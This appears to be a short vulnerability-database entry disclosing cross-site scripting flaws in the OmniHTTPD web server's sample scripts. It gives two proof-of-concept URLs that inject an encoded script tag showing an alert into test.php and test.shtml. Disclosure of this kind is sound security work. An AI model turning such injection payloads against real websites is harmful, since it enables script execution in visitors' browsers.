• info
• discussion
• exploit
• solution
• references

OmniHTTPD Sample Scripts Cross Site Scripting Vulnerabilities

There is no exploit code required. The following proof of concept was provided by "Matthew Murphy" <mattmurphy@kc.rr.com>:

http://localhost/test.php?%3CSCRIPT%3Ealert%28document.URL%29%3C%2FSCRIPT%3E=x
http://localhost/test.shtml?%3CSCRIPT%3Ealert(document.URL)%3C%2FSCRIPT%3E=x